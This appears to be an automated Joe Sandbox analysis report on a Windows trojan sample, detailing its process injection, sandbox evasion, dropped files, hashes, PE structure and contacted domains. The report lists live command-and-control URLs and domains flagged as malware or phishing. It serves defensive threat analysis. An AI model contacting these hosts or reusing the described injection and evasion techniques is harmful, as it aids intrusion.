          Source: Yara matchFile source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception612
          Process Injection          		2
          Virtualization/Sandbox Evasion          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts612
          Process Injection          		LSASS Memory121
          Security Software Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Software Packing          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562034 Sample: 5tCYPTkM6b.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 www.postmoon.xyz 2->31 33 www.nbjcgl.com 2->33 35 5 other IPs or domains 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 5 other signatures 2->49 11 5tCYPTkM6b.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\npsx.dll, PE32 11->29 dropped 63 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->63 65 Tries to detect virtualization through RDTSC time measurements 11->65 67 Injects a PE file into a foreign processes 11->67 15 5tCYPTkM6b.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.yixuan5.com 156.246.248.162, 49820, 80 Africa-on-Cloud-ASZA Seychelles 18->37 39 gooooooo.xyz 148.72.244.75, 49815, 80 AS-26496-GO-DADDY-COM-LLCUS United States 18->39 41 6 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 control.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5tCYPTkM6b.exe39%VirustotalBrowse
          5tCYPTkM6b.exe35%ReversingLabsWin32.Trojan.Risis
          5tCYPTkM6b.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.5tCYPTkM6b.exe.2300000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.2.control.exe.486796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.5tCYPTkM6b.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          2.0.5tCYPTkM6b.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.5tCYPTkM6b.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.5tCYPTkM6b.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          14.2.control.exe.53aa88.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.5tCYPTkM6b.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          2.0.5tCYPTkM6b.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          2.2.5tCYPTkM6b.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.5tCYPTkM6b.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9100%Avira URL Cloudmalware
          http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9100%Avira URL Cloudmalware
          www.dreamschools.online/b80i/100%Avira URL Cloudphishing
          http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9100%Avira URL Cloudmalware
          http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.yixuan5.com
          		156.246.248.162
          		truetrue
            		unknown
            www.micorgas.com
            		35.186.238.101
            		truefalse
              		unknown
              carriewilliamsinc.com
              		34.102.136.180
              		truefalse
                		unknown
                gooooooo.xyz
                		148.72.244.75
                		truetrue
                  		unknown
                  www.wildberryhair.com
                  		172.67.168.28
                  		truefalse
                    		unknown
                    farmacymerchants.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      freelance-rse.com
                      		193.141.3.66
                      		truetrue
                        		unknown
                        www.gooooooo.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.freelance-rse.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.carriewilliamsinc.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.nbjcgl.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.inslidr.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.postmoon.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.ehaszthecarpetbagger.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.farmacymerchants.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9false
                                        • Avira URL Cloud: malware
                                        		unknown
                                        www.dreamschools.online/b80i/true
                                        • Avira URL Cloud: phishing
                                        		low
                                        http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9false
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9true
                                        • Avira URL Cloud: phishing
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.298803762.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.276761296.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374119582.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312026121.0000000006840000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_Error5tCYPTkM6b.exefalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorError5tCYPTkM6b.exefalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              148.72.244.75
                                              		gooooooo.xyzUnited States
                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                              34.102.136.180
                                              		carriewilliamsinc.comUnited States
                                              		15169GOOGLEUSfalse
                                              156.246.248.162
                                              		www.yixuan5.comSeychelles
                                              		328608Africa-on-Cloud-ASZAtrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:562034
                                              Start date:28.01.2022
                                              Start time:10:45:02
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 44s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:5tCYPTkM6b.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:29
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/4@11/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 65.9% (good quality ratio 60.5%)
                                              • Quality average: 71.1%
                                              • Quality standard deviation: 31.6%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 80.67.82.235, 80.67.82.211
                                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                              • Not all processes where analyzed, report is missing behavior information

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\mgyagjb

                                              Download File
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5249
                                              Entropy (8bit):6.1160379955388935
                                              Encrypted:false
                                              SSDEEP:96:HE4FTINLY3hqAntRxvviaXlUvIz51HicLVHpoGr8m0uTfKo234O1pLF:LONLMhqAnTxvvia0K39pNrn0MSo2344F
                                              MD5:61327A82DC5ACFC628A9DDC93B1EDC0A
                                              SHA1:63C2213EA0752D4CD33BC4CD26BE1F6A5D5A5A4D
                                              SHA-256:1408C1FF01630D3A5FBAE695DB2B399CBDA3C4B4B43DB12B80AC8DB5C294A899
                                              SHA-512:CCF6C11A894171BE04737442D3BE0F4A843679B1D7E18E3458EBB74768FAB441522C4AA34FF877A50C902501EC68744A43747187BF23A284EF07E94832312212
                                              Malicious:false
                                              Reputation:low
                                              Preview:..Voo..........x.o^./y^b..^./y^b...xgo..k7ooo.x.on.[n._..g..pooo....n.[n._..g...ooo...#n.[n._..g.."ooo....n.[n._..g..1ooo./.3.._s.mW.z/rr.[......_..sB........k.s$B.m_|f...r.k.s%.k...x....mB.oooo.sSX.:xkn..|n..}n....n./.|n...n....i._v..[fv...O..d..n...}.W^X..rxk.oooo..SsRooo.sS`..x...........%[o.....^./y^b.g.W.o..[.O.W.o._.c$.g.$s.k.W.o..W.d.g.k...%[owI]....eoo..eoo%cowyn...yeoo..eoo%Wow`.....eoo..eoo%Wo.....7^./y^b....g_ooo....k..go.I.k.oo.k..k.g..g...cXoo./...W.mW|z.o.`..`.....mW|$.o.`..`.memW.z/o.X..wyn....doo..!pnn...^....n.W..nnn.....o.Y.x.o.V...dooo.....%so......^./y^b....g7ooo../.k..go.I.k.oo.k..k.g..g....soo./^..ooo.W.mW|z.o.`/.`3.[.mW|$.o.`/.`3._.mW|...`/.`3.cB.mW}z.r.H/.H3....mW|$.e.`/.`3mXmW.z/o.X/.wI]....ooo...knn....Go.W...G.d.Fn.Gn.cn._n.[n.W..qnn.....o.Y.x.o.V...dooo.....%co.....K..g_ooo....k..go.I.k.oo.k..k.g..g...mroo./...W.mW|z.o.`..`..[.mW|$.o.`..`.memW.z/o.X..w`....6ooo..Sknn...an.

                                              C:\Users\user\AppData\Local\Temp\nsiD4B3.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):265931
                                              Entropy (8bit):7.698831475857815
                                              Encrypted:false
                                              SSDEEP:6144:yXhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1KWGUDw:D4BEJYeyxgCNl5i0GYSU
                                              MD5:C02929E25042F9942FF27C1DB38973E3
                                              SHA1:86AA91161B74491FA9F8F9FC8D8EE0A0FCF22ED8
                                              SHA-256:ADD5757B03B27815F1B5A2E900C2995E7A077E5E46AFD6CE5E57953888F19156
                                              SHA-512:0C6A051D6B6270ED1CB77C104FAC5731A71D8D44933A0CDA7DC0D88A65A30221F732F3D457A9CF8311848394A9F20E3B733802BCF1E3F26A28FE5E9B39219AA4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.Y......,.......................,C.......X......yY..........................................................................................................................................................................................................................................J...............o...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nsiD4B4.tmp\npsx.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):20992
                                              Entropy (8bit):5.741923007087739
                                              Encrypted:false
                                              SSDEEP:384:i46PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbof3b:i4G1albrXY0HwinMdZeUhbovb
                                              MD5:FF94AC3A49E4C0BCDF0C1FE9730293D9
                                              SHA1:2F81D5B8EC6515FBDFA099EABB0BABF9D6C40B97
                                              SHA-256:4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
                                              SHA-512:01F8BC3AC735473C60E842D76D282F4859FD9FECADA580BFFC629A8127A821A0839ED832143C7034B3A1E3DFCA9561841626F0B8FBE582CB6A0E7DAB453A5A16
                                              Malicious:false
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L...a..a...........!.....@...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\wgtx82tpscdlgb4zlyrg

                                              Download File
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):216745
                                              Entropy (8bit):7.992922002092465
                                              Encrypted:true
                                              SSDEEP:6144:dhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1f:g4BEJYeyxgCNl5i0GYN
                                              MD5:1FABB2AB23318AC4B366E2FFB75034DD
                                              SHA1:A2ADE2676E8FA328D4A8C3640AE9BA14334BC2B2
                                              SHA-256:FAE6FF46EBDC2CFE9DBADD442892F2B569D048CFB4BCC560E32D501DD4A03F96
                                              SHA-512:6FDF083748944B9A00A2D4C57B1B832AE45C7A5E845A074890BBDADBD94967DC255EEDE9BEEDEA45CE4355E4AEE8567A42D54B85A06393A41D762E37134DB662
                                              Malicious:false
                                              Reputation:low
                                              Preview:.W.m.G.Q...w..*.9..;.1h.....G"...z*.6k......*..i.e.%.].,...-......k......n.I..M...j..j>...`.kA\w....4....>.D.e..3.........,..D<."+.$..^.]wl.*..>..^E..l..P._...QN0A.o.........N.3.....K';M.+L.......(P&.Go`...|nrJJ3.+..Q:n..]L..s.p...`pf..#.0......P2:.dG.Q..........]..,\....G"..}.z..6k...I..*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x......3..#..t.MEU...w.....(*&6........rJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.930341504736443
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:5tCYPTkM6b.exe
                                              File size:254186
                                              MD5:c2ca2ba9c38eb02217588662717ba6c3
                                              SHA1:8a897f24d2e564af2c2fcc272ab0cfbef10611b5
                                              SHA256:9af4d9ef8b2a850854ae23411d44d3603147c26898bca1010fd2f9b16f6d456e
                                              SHA512:7c7a80f37013b8b5fe27e0c9c3144884abde6ca49484c3e8c6cc78daa9f3b6ac890577247223e7d4875b865244e8732840c6a47170fbe2c7f27406ba4c8f52a6
                                              SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x403225
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:099c0646ea7282d232219f8807883be0

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000180h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409128h
                                              xor esi, esi
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407030h]
                                              push 00008001h
                                              call dword ptr [004070B4h]
                                              push ebx
                                              call dword ptr [0040727Ch]
                                              push 00000008h
                                              mov dword ptr [00423F58h], eax
                                              call 00007FC5D4E76EF0h
                                              mov dword ptr [00423EA4h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0041F450h
                                              call dword ptr [00407158h]
                                              push 004091B0h
                                              push 004236A0h
                                              call 00007FC5D4E76BA7h
                                              call dword ptr [004070B0h]
                                              mov edi, 00429000h
                                              push eax
                                              push edi
                                              call 00007FC5D4E76B95h
                                              push ebx
                                              call dword ptr [0040710Ch]
                                              cmp byte ptr [00429000h], 00000022h
                                              mov dword ptr [00423EA0h], eax
                                              mov eax, edi
                                              jne 00007FC5D4E743BCh
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 00429001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007FC5D4E76688h
                                              push eax
                                              call dword ptr [0040721Ch]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007FC5D4E74415h
                                              cmp cl, 00000020h
                                              jne 00007FC5D4E743B8h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007FC5D4E743ACh
                                              cmp byte ptr [eax], 00000022h
                                              mov byte ptr [eax+eax+00h], 00000000h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x2c1900x2e8dataEnglishUnited States
                                              RT_DIALOG0x2c4780x100dataEnglishUnited States
                                              RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                              RT_DIALOG0x2c6980x60dataEnglishUnited States
                                              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                              RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

